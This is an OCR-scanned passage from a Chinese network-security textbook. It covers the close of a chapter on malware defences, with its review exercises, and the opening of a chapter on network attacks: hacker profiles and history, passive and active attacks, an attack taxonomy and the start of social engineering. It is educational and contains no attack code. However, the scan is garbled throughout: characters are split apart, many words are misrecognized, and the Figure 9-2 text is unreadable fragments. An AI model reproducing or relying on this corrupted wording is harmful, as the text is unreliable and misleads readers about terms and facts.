操作 系统 为 它 分 配 相应 的 系统 资源 。 如 果 能 够 合理 控制 程序 对 系统 的 操作 权限 ， 则 程序 对 
系统 可 能 造成 的 破坏 将 被 限制 在 一 定 范围 内 。 安 全 操作 系统 采用 了 一 套 强制 存 取 控制 机 
制 ， 它 将 计算 机 系统 划分 为 三 个 空间 : 系统 管理 空间 、 用 户 空间 和 保护 空间 ， 并 将 进入 系 
统 的 用 户 划分 为 两 类 : 不 具有 特权 的 普通 用 户 和 系统 管理 员 。 其 中 ， 系 统管 理 空间 不 能 被 
普通 用 户 读 写 ; 用 户 空 间 包含 用 户 的 应 用 程序 和 数据 ， 可 以 被 用 户 读 写 ; 保护 空间 的 程序 
和 数据 不 能 被 用 户 空间 的 进程 修改 ， 但 可 以 被 用 户 空间 的 进程 读 取 ， 一 般 通用 的 命令 和 应 
用 程序 都 会 放 在 保护 空间 内 ， 供 用 户 使 用 。 由 于 普通 用 户 对 保护 空间 的 数据 只 能 读 不 能 
写 ， 从 而 限制 了 恶意 代码 的 传播 。 同 时 在 用 户 空间 内 ， 不 同 用 户 的 安全 级 别 不同 ， 恶 意 代 
码 也 只 能 感染 同 级 别 的 用 户 的 程序 和 数据 ， 限 制 了 恶意 代码 的 传播 范围 。 

3) ”完整 性 技术 

恶意 代码 感染 、 破 坏 其 他 目标 系统 的 过 程 ， 也 看 以 看 作 是 破坏 这 些 目 标 完整 性 的 过 
程 。 因 此 为 了 保护 这 些 资源 不 受 恶意 代码 的 感染 和 破坏 ， 采 用 完整 性 技术 也 是 防御 恶意 代 
码 的 一 种 有 效 手段 。 例 如 “ 校 验 和 ”技术 和 Windows 的 “代码 签名 ”验证 都 是 完整 性 技 
术 比 较 典 型 的 例子 。 


2. 基于 网 络 的 恶意 代码 防护 技术 


基于 网 络 的 恶意 代码 检测 技术 主要 有 异常 检测 技术 和 误 用 检测 技术 。 

1) ”异常 检测 技术 

由 于 蠕虫 恶意 代码 在 传播 时 发 送 大 量 的 网 络 扫描 数据 包 ， 导 致 网 络 流量 明显 增加 ， 并 
且 其 扫描 数据 包 具 有 很 强 的 规律 性 ， 通 过 异常 检查 可 发 现 网 络 内 主机 可 能 感染 恶意 代码 以 
及 感染 恶意 代码 的 严重 程度 ， 然 后 采取 控制 措施 ， 比 如 限制 计算 机 发 送 数据 包 、 计 算 机 
断 网 。 

异常 检测 技术 可 以 很 快 发 现 网 络 流量 的 异常 ， 并 采取 措施 ， 避 免 网 络 瘫痪 和 恶意 代码 
的 大 规模 传播 。 而 且 它 不 仅 能 检测 出 已 知 恶意 代码 产生 的 异常 流量 ， 也 能 够 检测 出 未 知 恶 
意 代码 产生 的 异常 流量 。 即 异常 检测 能 检测 出 未 知 的 新 出 现 的 恶意 代码 。 但 是 异常 检测 只 
能 发 现 恶 意 代 码 ， 而 一 般 不 能 检测 出 究竟 是 哪 一 种 恶意 代码 ， 这 样 就 不 利于 采取 有 针对 性 


290 网 络 安全 与 管理 


的 防范 措施 了 ， 另 外 异常 检测 的 误 报 率 也 相对 比较 高 。 

2) ” 误 用 检测 技术 

误 用 检测 技术 也 称 基于 特征 的 检测 ， 这 种 技术 首先 要 建立 特征 规则 库 ， 然 后 将 一 个 数 
据 包 或 数据 流 中 的 数据 与 特征 库 中 的 特征 码 相 比较 。 特 征 库 中 的 特征 码 规则 包括 协议 类 
型 、 端 口号 、 特 征 串 、 数 据 包 长 度 等 。 基 于 网 络 的 恶意 代码 检测 中 使 用 的 特征 串 与 基于 主 
机 检测 使 用 的 特征 串 不 同 ， 一 个 特征 码 规则 可 以 有 多 个 特征 串 ， 特 征 码 规则 指定 了 每 个 特 
征 串 的 相对 偏 移 和 间隔 位 置 。 

误 用 检测 技术 能 够 检测 出 计算 机 感染 恶意 代码 的 具体 类 型 ， 并 且 其 检测 结果 也 会 比较 
准确 。 但 是 误 用 检测 技术 一 般 不 能 检测 出 未 知 恶 意 代码 ， 其 检测 范围 和 准确 性 依赖 于 特征 
库 的 完备 程度 ， 并 需要 不 断 更 新 特征 库 规 则 。 

除了 检测 ， 基 于 网 络 的 恶意 代码 防范 的 关键 是 控制 ， 即 阻止 恶意 代码 的 传播 和 对 网 络 
的 破坏 ， 比 较 成 熟 的 技术 有 网 络 隔离 技术 和 防火 墙 控制 技术 。 其 中 网 络 隔离 控制 技术 就 是 
当 检 测 到 计算 机 感染 了 恶意 代码 后 ， 立 即 把 该 计算 机 断 网 。 这 种 方式 可 以 立即 阻止 该 计算 
机 继续 传播 恶意 代码 和 对 网 络 的 破坏 ， 同 时 实现 起 来 也 相对 简单 。 但 是 ， 由 于 检测 技术 存 
在 误 报 ， 从 而 可 能 导致 错误 地 隔离 计算 机 。 另 外 ， 采 取 隔 离 措施 后 ， 由 于 计算 机 不 能 上 
网 ， 像 下 载 补丁 、 杀 毒 软件 升级 等 正常 的 防范 措施 也 不 能 进行 了 。 而 采用 防火 墙 控制 技术 
控制 恶意 代码 ， 可 以 根据 恶意 代码 传播 的 特点 ， 通 过 设置 和 修改 防火 墙 规则 ， 禁 止 恶 意 代 
码 的 传播 和 扫描 数据 包 通 过 ， 从 而 达到 控制 恶意 代码 的 目的 。 这 种 技术 只 限制 恶意 代码 流 
量 通 过 ， 而 允许 正常 的 网 络 流量 通过 ， 效 果 相 对 比较 好 。 但 由 于 恶意 代码 的 传播 源 往往 在 
企业 网 络 内 部 ， 传 统 的 放置 在 网 络 边 界 的 防火 墙 对 恶意 代码 的 控制 作用 不 太 明显 ， 需 要 采 
取 多 层次 的 防火 墙 配置 方案 ， 实 现 起 来 要 比 隔离 技术 复杂 。 


8.5 本 章 小 结 


本 章 讨论 了 计算 机 病毒 和 恶意 软件 的 主要 技术 和 防御 措施 。 通 过 本 章 的 学 习 ， 帮 助 读 
者 初步 建立 起 对 计算 机 病毒 和 恶意 软件 的 基本 认识 ， 了 解 计算 机 病毒 的 基本 技术 原理 和 发 
展 趋势 ， 加 深 对 恶意 软件 的 理解 和 防范 。 由 于 目前 计算 机 病毒 和 恶意 软件 的 种 类 和 实现 技 
术 种 类 繁多 ， 感 兴趣 的 读者 可 根据 自己 的 爱好 和 兴趣 阅读 其 他 相关 的 书籍 。 另 外 ， 对 计算 
机 病毒 和 恶意 软件 的 防范 不 仅 取 决 于 技术 上 的 准备 ， 与 用 户 的 安全 意识 、 正 确 的 上 网 习惯 
和 软件 使 用 习惯 等 都 有 很 大 的 关系 。 


8.6 课 后 习题 


1. 填空 题 

(1) 根据 计算 机 病毒 传播 依赖 的 媒介 ， 可 将 计算 机 病毒 划分 为 病毒 、 病 
毒 和 病毒 。 

(2) 从 传统 计算 机 病毒 开始 ， 病 毒 开发 者 就 采用 了 、 变 


体 引擎 、 更 名 感染 等 技术 。 
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(3) 恶意 软件 的 传输 机 制 为 、 借 助 P2P 网 络 、 及 远程 
利用 。 
2. 选择 题 
(1) 下 面 ( ”) 症 状 不 是 感染 计算 机 病毒 时 常见 到 的 。 
A. 屏幕 上 出 现 跳 动 的 小 球 B. 打印 时 显示 No paper 
C. 系统 出 现 异 常 死 锁 现象 D. 系统 . exe 文件 字 节 数 增加 
(2) 通过 复制 自身 来 传播 的 病毒 叫做 (  )。 
A. 伴随 型 病毒 B. 蠕虫 型 病毒 C. 寄生 型 病毒 ”DD. 变型 病毒 
(3) 下 面 (  ) 不 是 宏 病毒 的 特点 。 
A. 传播 速度 快 B. 开发 和 变种 技术 实现 简单 
C. 多 平台 交叉 感染 D. 只 感染 程序 文件 
3. 判断 题 
(1) 计算 机 病毒 可 以 对 计算 机 硬件 造成 不 可 修复 的 破坏 。 ¢ 
(2) 计算 机 病毒 只 要 人 们 不 去 执行 它 ， 它 就 无 法 发 挥 作用 。 KE 


(3) “ 云 安 全 (Cloud Security)” 计 划 目 前 是 网 络 时 代 信息 安全 的 最 新 体现 。 (  ) 
4. 简 答题 


(1) 计算 机 病毒 的 基本 特征 是 什么 ? 
(2) 网 络 蠕虫 病毒 的 发 展 趋势 是 什么 ? 
(3) 常见 病毒 的 检测 和 查 杀 方法 有 哪些 ? 


网 络 安全 与 网 络 攻击 是 紧密 联系 在 一 起 的 ， 研 究 网 络 安全 不 能 


忌讳 网 络 攻击 。 研 究 网 络 安全 若 不 了 解 网 络 攻击 原理 及 其 技术 等 于 
纸上谈兵 。 从 某 种 意义 上 说 ， 没 有 攻击 就 没有 安全 ， 也 可 以 说 安全 
与 攻击 并 存 。 网 络 攻击 是 网 络 安全 研究 中 的 重要 课题 之 一 。 我 们 要 
做 到 “知己 知 彼 ”， 才 能 “ 百 战 不 至 ”， 对 黑客 的 攻击 手段 、 途 径 、 
方法 和 工具 了 解 得 越 多 ， 越 有 利于 保护 网 络 和 信息 的 安全 。 

入 侵 检测 技术 是 近年 来 飞速 发 展 起 来 的 一 种 动态 的 集 监控 、 预 
防 和 抵御 系统 入 侵 行为 为 一 体 的 新 型 安全 机 制 。 作 为 1 | 
的 补充 ， 入 侵 检测 技术 不 再 是 被 动 地 对 入 侵 行为 
而 是 能 够 提出 预警 并 做 出 相应 反应 动作 。 入 侵 检 
Detection System，IDS) 可 以 识别 针对 计算 机 系统 和 
广泛 意义 上 的 信息 系统 的 非法 攻击 ， 包 括 检测 外 界 非法 
意 攻击 或 试探 ， 以 及 内 部 合法 用 户 的 超越 使 用 权限 的 非 ; 
常 来 说 入 侵 检 测 是 对 计算 机 和 网 络 资源 上 的 恶意 使 用 行为 进行 识别 
和 相应 处 理 的 过 程 ， 具 有 智能 监控 、 实 时 探测 、 动 态 响应 、 易 于 配 
置 等 特点 。 本 章 将 围绕 网 络 攻防 和 入 侵 检测 展开 详细 介绍 。 
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9.1 网 络 攻 击 概述 


近年 来 ， 网 络 攻击 事件 频繁 发 生 ， 攻 击 泛滥 已 成 互联 网 行业 重病 ， 各 行业 呼吁 国家 和 
运营 商 联手 整治 网 络 攻击 ， 保 障 网 络 安全 。 面 对 多 种 多 样 的 网 络 攻击 ， 为 了 能 够 更 好 地 防 
御 这 些 攻 击 ， 就 特别 有 必要 了 解 相关 的 网 络 攻击 。 


9.1.1 网 络 攻击 的 概念 


网 络 攻击 (Network Attack) 是 指 利用 网 络 存 在 的 漏洞 和 安全 缺陷 对 网 络 系统 的 硬件 、 软 
件 及 其 系统 中 的 数据 进行 的 攻击 。 图 9-1 表明 ， 各 行 各 业 均 受到 网 络 攻击 的 威胁 。 


9-1 黑客 正在 对 网 络 进行 攻击 


1. 网 络 攻击 的 形成 


随 着 网 络 技术 的 不 断 发 展 ， 网 络 攻击 的 方式 、 手 段 不 但 复杂 也 在 不 断 变化 。 归 纳 目 前 
常见 的 网 络 攻击 现象 ， 网 络 攻击 所 具有 的 基本 特征 是 : 由 攻击 者 发 起 并 使 用 一 定 的 攻击 工 
具 ， 对 目标 网 络 系统 进行 攻击 访问 操作 ， 并 呈现 出 一 定 的 攻击 效果 ， 即 实现 了 攻击 者 预定 
义 的 攻击 意图 。 网 络 攻击 包含 了 以 下 几 个 要 素 。 

1) ”攻击 者 

在 这 里 ， 攻 击 者 特 指 怀 着 不 良 企图 发 起 网 络 攻击 的 人 员 。 一 般 多 指 黑客 ， 热 衷 研究 、 
撰写 程序 的 专 才 ， 精 通 各 种 计算 机 语言 和 系统 ， 且 必须 具备 乐于 追根 究 底 、 穷 究 问 题 的 特 
质 。“ 黑 客 ” 一 词 是 由 英语 Hacker 音译 出 来 的 ， 是 指 专 门 研究 、 发 现 计算 机 和 网 络 漏洞 
的 计算 机 爱好 者 。 他 们 伴随 着 计算 机 和 网 络 的 发 展 而 产生 并 成 长 。 黑 客 对 计算 机 有 着 狂热 
的 兴趣 和 执著 的 追求 ， 他 们 不 断 地 研究 计算 机 和 网 络 知识 ， 发 现 计算 机 和 网 络 中 存在 的 漏 
洞 ， 喜 欢 挑战 高 难度 的 网 络 系统 并 从 中 找到 漏洞 ， 然 后 向 管理 员 提出 解决 和 修补 漏洞 的 方法 。 

也 有 人 根据 目的 和 动机 的 不 同 ， 把 黑客 这 一 大 群体 又 细 分 为 黑客 (Hacker)、 骇 客 
(Cracker)、 红 客 等 。 从 传统 角度 来 看 ， 黑 客 主要 是 依靠 自己 掌握 的 知识 帮助 系统 管理 员 找 
出 系统 中 的 漏洞 并 加 以 完善 ， 骇 客 则 是 通过 各 种 黑客 技能 对 系统 进行 攻击 、 入 侵 或 者 做 其 
他 一 些 有 害 于 网 络 的 事情 ; 因此 ， 黑 客 并 不 是 骇 客 ， 两 者 之 间 还 是 有 很 大 的 区 别 的 ， 前 者 
主要 工作 是 建设 ， 而 后 者 是 破坏 。 经 过 时 间 的 推移 ， 黑 客 一 词 也 不 断 派 生出 新 的 意思 。 
“ 红 客 ”(RedhackeD 则 是 由 “黑客 ”一 词 派 生出 来 的 ， 多 指 国内 那些 利用 自己 掌握 的 技术 
去 维护 国内 网 络 的 安全 ， 并 对 外 来 进攻 进行 还 击 的 一 些 黑客 组 织 。 
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黑客 的 特点 : 

(1) 充当 黑客 的 年 轻 人 居多 。 

黑客 年 龄 一 般 在 10 余 岁 到 30 岁 之 间 ， 其 中 有 许多 未 成 年 的 小 孩 ， 如 美国 号 称 “ 世 界 
头号 计算 机 黑客 ”的 Kevin Mitnick，13 岁 迷 上 计算 机 ，15 岁 冯 入 “北美 空中 防务 指挥 系 
统 ”; 英国 的 Mathew Bevan 14 岁 侵入 英国 的 电信 公司 ; 我 国 呼和浩特 市 一 个 10 岁 的 初 
中 生 破 译 了 该 市 通信 公司 的 系统 管理 员 的 账号 等 。 

(2) 人 员 的 构成 相对 集中 。 

70% 以 上 的 黑客 事件 是 由 内 部 人 员 或 外 部 与 内 部 合谋 进行 的 。 一 般 来 说 ， 外 部 黑客 入 
侵 的 目的 主要 是 破坏 系统 ， 而 内 部 或 内 外 勾结 的 入 侵 多 数 是 为 了 获取 信息 ;外 部 黑客 对 一 
个 站 点 可 能 只 入 侵 一 次 ， 内 部 或 内 外 勾结 的 入 侵 可 能 会 连续 几 次 。 

(3) 黑客 活动 时 间 相对 固定 。 

黑客 活动 主要 是 在 晚上 到 凌晨 、 周 末 或 节假日 。 因 为 职业 化 的 黑客 很 少 ， 一 般 黑客 多 
有 自己 的 工作 ， 实 施 黑客 活动 需要 利用 休息 时 间 ， 又 因为 在 这 些 时 间 里 ， 工 作 场所 的 人 员 
少 ， 便 于 隐蔽 。 

(4) 从 发 展 趋势 看 ， 黑 客 正 在 不 断 地 走向 系统 化 、 组 织 化 和 年 轻 化 。 

黑客 甚至 定期 召开 会 议 ， 如 他 们 每 4 年 在 荷兰 举行 一 次 Hack-Tic 会 议 、 在 拉 斯 维 加 
斯 举行 DefCon 会 议和 在 加 利 福 尼 亚 的 Lake Tahoe 举行 “黑客 大 会 ”。 

2) ”攻击 工具 

往往 攻击 者 需要 借助 一 系列 的 网 络 攻击 工具 (包括 攻击 策略 与 方法 )， 才 能 对 目标 网 络 
实施 攻击 。 很 多 软件 或 设备 可 以 为 网 络 管理 和 安全 提供 保障 ， 但 当 被 别有用心 的 人 所 利用 
时 ， 就 成 了 黑客 工具 ， 比 如 : 利用 ping 命令 可 以 检查 网 络 是 否 能 够 连通 ， 用 好 它 可 以 很 
好 地 帮助 我 们 分 析 判 定 网 络 故 障 。 但 是 别有用心 的 人 把 它 变异 成 ping of death， 这 是 通过 
分 片 传输 大 于 64K 的 包 ， 导 致 系统 崩溃 。 这 就 是 一 种 典型 的 利用 口令 来 攻击 服务 器 系统 
的 行为 ， 就 像 刀具 ， 它 是 基本 的 生活 用 具 ， 但 它 如 果 被 一 些 不 法 分 子 利 用 时 ， 就 可 成 为 杀 
人 凶器 。 那 么 ， 除 了 命令 以 外 ， 常 见 的 攻击 工具 还 有 恶意 代码 或 程序 、 利 用 操作 系统 漏 
洞 、 利 用 一 些 流氓 软件 、 利 用 搜索 引擎 优化 技术 进行 网 络 攻击 等 。 

3) ”攻击 效果 

通常 ， 攻 击 效果 的 呈现 形式 为 : 四 破坏 数据 ， 删 除 或 修改 系统 中 存储 的 数据 或 者 网 络 
中 传送 的 数据 ; @ 信 息 泄密 ， 窃 取 或 公布 敏感 信息 ; @@ 窃 取 服 务 ， 未 授权 使 用 计算 机 或 网 
络 服务 ，@ 拒 绝 服务 ， 干扰 系统 和 网 络 的 正常 服务 ， 降 低 系 统 和 网 络 性 能 ， 甚 至 使 网 络 系 
统 衣 省。 

4) ”攻击 目的 

网 络 攻击 者 的 目的 主要 体现 在 以 下 方面 : 只 是 为 了 显示 一 下 自己 的 能 力 ; 仅仅 是 恶 作 
剧 或 戏弄 别人 ; 为 了 获取 所 需 : 科技 情报 、 个 人 资料 、 金 融 账户 、 技 术 成 果 和 系统 信息 ; 
为 了 破坏 网 络 正常 的 服务 ， 使 网 络 瘫痪 ; 为 了 窃取 军事 和 商业 情报 ;为 了 算 改 有 关 数 据 以 
达到 非法 目的 ， 为 了 蓄意 制造 混乱 、 打 击 报复 等 。 


2. 网 络 攻击 的 特点 


近年 来 ， 黑 客 攻 击 网 络 呈 逐年 上 升 趋势 。2010 年 11 月 30 日 ， 中 华人 民 共 和 国 公安 
部 公布 的 一 批 在 我 国境 内 破获 的 打击 黑客 攻击 破坏 活动 的 典型 案例 中 表明 ， 目 前 我 国 的 网 
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络 攻击 呈现 三 大 特点 : 一 是 绝 大 多 数 黑客 攻击 破坏 活动 以 牟利 为 目的 。 网 络 攻击 者 主要 通 
过 制作 传播 病毒 盗 窒 网 络 银行 账号 、 游 戏 装备 等 方式 获 利 ; 二 是 分 工 细 化 、 形 成 利益 链 
条 。 黑 客 攻击 活动 已 形成 了 由 制作 提供 黑客 工具 、 实 施 攻击 、 资 窃 账 号 、 倒 卖 账号 、 提 供 
交易 平台 等 各 个 环节 分 工 合作 的 利益 链条 ; 三 是 被 攻击 的 计算 机 信息 系统 涉及 多 个 领域 。 
近年 针对 政府 、 金 融 、 交 通 、 电 力 、 教 育 、 科 研 等 领域 系统 的 攻击 数量 明显 上 升 ， 社 会 危 
害 性 越 来 越 大 。 


9.1.2 ”网 络 攻击 的 类 型 


十 几 年 前 ， 网 络 攻击 仅 限 于 破解 口令 ， 或 利用 操作 系统 安全 漏洞 、 网 络 设备 等 有 限 的 
几 种 攻击 方式 。 随 着 网 络 应 用 规模 的 日 益 扩大 和 技术 发 展 ， 出 现 了 各 种 各 样 的 网 络 攻击 方 
式 ， 对 网 络 安全 构成 了 极 大 威胁 。 由 于 网 络 攻击 方式 的 多 样 化 ， 可 从 不 同 的 角度 进行 分 
类 。 事 实 上 ， 目 前 也 没有 统一 、 明 确 的 方法 对 网 络 攻击 进行 分 类 和 界定 ， 因 为 从 不 同 的 角 
度 考察 网 络 的 安全 威胁 ， 得 出 的 结论 并 不 一 致 。 

根据 ITU-TX.800 和 RFC2828 对 网 络 安全 攻击 进行 的 分 类 ， 有 被 动 攻击 和 主动 攻击 两 
种 类 型 。 

被 动 攻击 是 指 在 不 影响 网 络 正常 工作 的 情况 下 ， 进 行 截获 、 窃 听 、 破 译 以 获得 重要 机 
密 信息 的 攻击 行为 。 被 动 攻 击 的 特性 是 对 传输 进行 非法 窃听 和 监测 ， 攻 击 者 的 目标 是 截获 
在 网 上 传输 的 重要 敏感 信息 或 机 密 信息 。 信 息 内 容 的 泄露 和 流量 分 析 就 是 两 种 被 动 攻击 。 
在 局 域 网 如 以 太 网 总 线 上 ， 很 容易 实现 监听 ， 因 为 信息 本 来 就 是 在 共享 信道 上 广播 的 。 攻 
击 者 只 要 把 监听 设备 的 网 卡 设置 成 混杂 模式 ， 连 在 以 太 网 上 就 可 以 接收 到 网 络 传输 的 所 有 
数据 帧 。 剥 去 帧 头 就 可 以 得 到 卫 数据 包 ， 剥 去 了 P 报头 、TCP 报头 后 ， 就 可 获得 数据 。 更 
为 严重 的 是 在 用 Telnet 远程 登录 时 ， 用 户 的 标识 符 及 口令 也 是 一 个 字符 、 一 个 字符 地 封装 
成 TCP 数据 包 、IP 数据 包 、 以 太 网 帧 在 网 上 传输 。 在 网 上 监听 的 设备 只 要 稍 做 协议 分 析 
就 可 轻而易举 地 获取 用 户口 令 等 敏感 信息 ， 有 了 口令 就 可 以 登录 到 远程 主机 做 任何 事情 。 
由 于 被 动 攻击 不 涉及 对 数据 的 更 改 ， 所 以 很 难 检测 到 ， 但 可 以 通过 加 密 的 手段 来 阻止 它 。 
因此 防止 被 动 攻击 的 方法 主要 是 对 数据 进行 加 密 后 再 传输 。 用 户口 令 等 敏感 信息 被 转换 成 
密 文 传输 ， 这 样 即使 被 监听 ， 所 截取 的 数据 也 是 密 文 ， 仍 是 比较 安全 的 。 处 理 被 动 攻击 的 
重点 是 预防 ， 而 不 是 检测 。 

主动 攻击 是 指 对 数据 甚至 网 络 本 身 进 行 恶 意 的 破坏 ， 包 括 对 数据 进行 算 改 或 伪造 数据 
流 ， 主 要 有 阻 断 、 伪 造 、 重 放 、 消 息 算 改 和 拒绝 服务 等 形式 。 其 中 ， 重 放 是 指 被 动 地 捕获 
数据 单元 ， 然 后 按照 原来 的 顺序 重新 传送 ， 从 而 产生 未 经 授权 的 效果 ; 拒绝 服务 是 阻止 或 
禁止 通信 设施 的 正常 运行 和 使 用 。 这 种 攻击 可 能 有 有 具体 的 目标 ， 比 如 ， 某 实体 可 能 会 查禁 
所 有 发 向 某 目的 地 的 消息 。 拒 绝 服务 的 另 一 种 形式 是 破坏 实体 网 络 ， 或 使 网 络 过 载 ， 以 降 
低 其 性 能 。 

另外 ， 亚 意 代 码 (或 称 恶意 程序 ) 也 属于 一 种 很 特殊 的 主动 攻击 方式 。 恶 意 代码 种 类 繁 
多 ， 对 网 络 安全 有 较 大 威胁 的 是 : @ 计 算 机 病毒 ， 是 一 种 能 传染 给 其 他 程序 的 代码 ， 传 染 
是 通过 修改 其 他 程序 来 把 自身 或 其 变种 复制 进去 的 。@ 蠕 虫 ， 是 一 种 通过 网 络 的 体系 功能 
将 自身 从 一 个 节点 发 送 到 另 一 个 节点 并 启动 运行 的 代码 。@ 特 洛 伊 木 马 ， 也 是 一 种 程序 ， 
它 执行 的 功能 超出 所 声称 的 功能 ， 例 如 ， 一 个 编译 程序 除了 执行 编译 任务 之 外 ， 还 可 以 把 
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用 户 的 源 程序 复制 下 来 。@ 逻 辑 炸弹 ， 是 一 种 当 运 行 环境 满足 某 种 特定 条 件 时 ， 就 执行 其 
他 特殊 功能 的 代码 ， 例 如 一 个 编辑 程序 ， 通 常 运 行 很 正常 ， 但 当 系 统 时 间 为 13 日 又 为 星 
期 五 时 ， 它 就 会 删除 系统 中 的 所 有 文件 。 

主动 攻击 与 被 动 攻击 的 特性 恰好 相反 。 被 动 攻 击 虽 然 难以 检测 但 可 以 防御 ， 主 动 攻击 
却 难 以 防御 ， 但 容易 检测 。 完 全 杜绝 主动 攻击 是 很 困难 的 ， 但 一 个 好 的 身份 认证 协议 能 防 
御 主 动 攻击 。 

按照 攻击 对 象 将 网 络 攻击 归纳 为 服务 攻击 与 非 服务 攻击 两 大 类 型 。 服 务 攻击 是 指 对 网 
络 中 提供 某 种 服务 的 主机 、 服 务 器 发 起 的 攻击 ， 致 使 网 络 “ 拒 绝 服务 ”。 攻 击 者 利用 各 种 
方法 对 网 络 通信 设备 (如 路 由 器 、 交 换 机 ) 发 起 攻击 ， 使 得 网 络 通信 设备 严重 阻塞 或 瘫痪 ， 
致使 网 络 不 能 完成 正常 的 通信 任务 。 非 服务 攻击 不 针对 某 项 具体 应 用 服务 ， 而 是 对 网 络 层 
及 低层 网 络 协议 进行 的 。 

在 大 多 数 场合 ， 也 常常 按照 所 采用 的 攻击 手段 将 网 络 攻击 划分 为 系统 入 侵 类 攻击 、 拒 
绝 服务 攻击 、 缓 冲 区 溢出 攻击 、 坎 骗 攻 击 等 类 型 。 显 然 ， 对 于 系统 入 侵 类 攻击 ， 其 目的 是 
获得 主机 系统 的 控制 权 ， 破 坏 主机 和 网 络 系统 。 这 类 攻击 又 可 分 为 信息 收集 攻击 、 口 令 攻 
击 、 漏 洞 攻击 等 。 因 此 可 以 从 不 同 的 角度 讨论 网 络 攻击 。 本 章 后 续 内 容 将 按照 这 种 类 别 讨 
论 介绍 网 络 攻击 原理 与 技术 。 


9.1.3 ”网 络 攻击 的 手段 


目前 ， 网 络 安全 领域 风起云涌 ， 从 频频 被 利用 的 系统 漏洞 到 悄然 运行 的 木马 工具 ， 从 
技术 精湛 的 网 络 注入 到 隐蔽 性 更 强 的 钓鱼 式 攻 击 ， 攻 击 手 段 越 来 越 加 高 明 。 网 络 攻 击 技术 
的 发 展 已 经 呈现 出 ，Q@ 智 能 化 、 自 动 化 网 络 攻击 ; @@ 多 目标 网 络 攻击 ，@@ 协 同 网 络 攻击 ; 
@ 网 络 拒绝 服务 攻击 ， 句 高 速 网 络 攻击 等 特点 。 而 且 ， 在 互联 网 上 黑客 网 站 随处 可 见 ， 攻 
击 工具 也 可 以 任意 下 载 ， 攻 击 活动 日 益 独 狐 。 黑 客 攻 击 已 经 对 网 络 安全 构成 了 极 大 的 威 
胁 。 从 攻击 者 的 角度 来 看 ， 常 用 的 攻击 手段 不 外 乎 以 下 几 种 ， 其 步骤 如 图 9-2 所 示 。 


既 点 


2 je 


全 发 网 络 监听 


站 窗 折 非法 访问 数据 
、 提取 这 码 文件 


厂 获取 口令 


babe 要 意 代 码 


攻击 < 、 网 络 数 矣 
三 导 政 异 和 型 


拒绝 服务 机 源 耗 尽 型 
人 坎 驴 型 
六 缓冲 区 洲 出 


格式 化 字符 中 攻击 
输入 验证 攻击 


数据 更 动 攻击 


同步 漏洞 攻击 


一 日 去 清理 \ 
信任 油 洞 攻击 


访 若 上。 安装 后 门 


内 芒 套 件 


图 9-2 网络 攻击 的 分 类 层次 结构 
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如 图 9-2 所 示 ， 从 攻击 者 的 角度 出 发 ， 攻 击 的 步骤 可 分 为 探测 (Probe)、 攻 击 (Exploit) 
和 隐藏 (Conceal)。 攻 击 技术 分 类 方法 据 此 分 为 探测 、 攻 击 和 隐藏 3 大 类 ， 并 在 每 类 中 对 各 
种 不 同 的 攻击 技术 进行 细 分 ， 后 面 将 详细 介绍 。 


9.1.4 网 络 攻击 在 我 国 的 发 展 过 程 


在 我 国 ， 第 一 代 (1996 一 1998)，1996 年 因特网 在 中 国 兴起 ， 中 国 第 一 代 黑 客 大 多 是 从 
事 科 研 、 机 械 等 方面 的 工作 的 人 ， 他 们 有 着 较 高 的 文化 素质 和 计算 机 技术 水 平 。 

1998 年 8 月 在 一 些 地 区 发 生 了 针对 华人 的 暴乱 ， 国 内 计算 机 爱好 者 怀 着 一 片 爱 国之 
心 和 对 同胞 惨遭 杀害 的 悲痛 之 心 ， 纷 纷 对 这 些 行为 进行 抗议 。 中 国 黑 客 对 这 些 地 区 的 网 站 
发 动 了 攻击 ， 当 时 黑客 代表 组 织 为 “绿色 兵团 ”。 

第 二 代 (1998 一 2000)， 随 着 计算 机 的 普及 和 因特网 的 发 展 ， 在 第 一 代 黑 客 的 影响 和 指 
点 下 ， 中 国 出 现 了 第 二 代 的 黑客 。 他 们 一 部 分 是 从 事 计 算 机 的 工作 者 和 网 络 爱好 者 ， 另 一 
部 分 是 在 校 学 生 。 

这 一 代 的 兴起 是 由 1999 年 5 月 8 日 某国 狠 炸 中 国 南 斯 拉夫 大 使 馆 事件 引发 ， 黑 客 代 
表 组 织 为 原 “ 中 国 黑客 联盟 ”。 

第 三 代 (2000 一 2003)， 这 一 代 黑 客 主要 由 在 校 学 生 组 成 ， 其 技术 水 平和 文化 素质 与 第 
一 代 、 第 二 代 相 差 甚 远 ， 大 都 只 是 照搬 网 上 一 些 有 前 人 总 结 出 来 的 经 验 和 攻击 手法 。 

这 一 代 的 兴起 是 由 2001 年 4 月 的 一 起 撞 机 事件 引发 ， 黑 客 代表 组 织 为 “ 红 客 联 
盟 ”、“ 中 国 鹰 派 ”。 

第 四 代 (2003 至 今 )， 黑 客 组 织 开 始 由 大 联盟 向 小 团队 模式 发 展 ， 更 注重 小 组 间 的 技术 
交流 及 一 种 团队 合作 精神 ， 比 较 出 色 的 有 “ 政 恶 八进制 ”、“ 火 狐 技 术 联 盟 ”等 。 


9.2 探测 技术 


探测 是 黑客 在 攻击 开始 前 必需 的 情报 收集 工作 ， 攻 击 者 通过 这 个 过 程 需要 尽 可 能 多 地 
了 解 与 攻击 目标 安全 相关 的 方方面面 的 信息 ， 以 便 能 够 集中 火力 进行 攻击 。 探 测 又 可 以 分 
为 3 个 基本 步骤 踩点、 扫描 和 查 点 。 


9.2.1 踩点 


踩点 是 攻击 者 最 先 需要 进行 的 工作 。 踩 点 有 很 多 方法 ， 目 前 使 用 最 多 的 有 社交 工程 、 
搜索 引擎 、Whois 方法 和 DNS 查询 等 。 

社交 工程 学 ， 在 黑客 理论 中 ， 指 利用 人 性 的 弱点 、 利 用 人 际 交 往 上 的 漏洞 来 非法 获取 
资料 的 行为 。 社 交工 程 并 不 是 什么 难事 ， 主 要 是 利用 人 在 心理 学 和 行为 学 上 的 特殊 行为 。 
或 者 可 以 说 ， 普 通 的 黑客 技术 是 入 侵 方 与 受害 方 的 计算 机 的 交流 ， 其 间 仅 通过 计算 机 ; 而 
社交 工程 则 是 在 侵入 的 过 程 中 有 入 侵 方 与 受害 方 的 人 的 对 话 过 程 ， 并 且 入 侵 方 所 需要 的 信 
息 只 能 通过 这 种 途径 获得 。 

例如 ， 一 位 黑客 要 入 侵 一 个 公司 的 内 部 网 络 ， 他 先 在 因特网 上 查找 该 公司 的 职员 信 
息 ， 找 到 主管 的 名 字 与 公司 电话 (对 外 的 ); 然后 拨打 前 台 的 电话 ， 假 冒 主管 声称 “ 因 在 外 
